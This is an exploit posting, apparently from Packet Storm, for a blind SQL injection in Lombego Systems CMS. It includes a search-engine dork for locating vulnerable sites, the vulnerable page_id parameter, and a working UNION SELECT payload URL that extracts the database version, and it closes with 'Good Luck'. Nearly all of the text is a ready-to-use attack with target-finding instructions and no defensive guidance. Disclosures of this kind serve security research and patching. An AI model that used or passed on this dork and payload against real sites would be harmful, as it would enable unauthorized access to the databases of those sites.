Lombego Systems CMS suffers from a remote SQL injection vulnerability.
2d3913841b752733acfe305f3e0dace83d679a219ed47e2c6b8d7ad6f46f3bb6#########################################################
# Title : Lombego Systems CMS Blind SQLI
# Author: Codeine
# Vendor: [Lombego Systems] http://www.lombego.de/
# Email : f3codeine[at]yahoo[dot]com
# Date : 06/25/2011
# Dork : intext:"Powered by Lombego Systems" inurl:index.php?page_id=
# Cat : PHP [SQli]
#########################################################
[*]Injecton Point:
http://www.site.com/frontend/index.php?page_id='#
[*]Exploit:
http://www.site.com/frontend/index.php?page_id=-1 union select 1,2,3,@@version--
>Good Luck<
#########################################################
# Greetz: Hidden
# Enjoy ^_^
#########################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed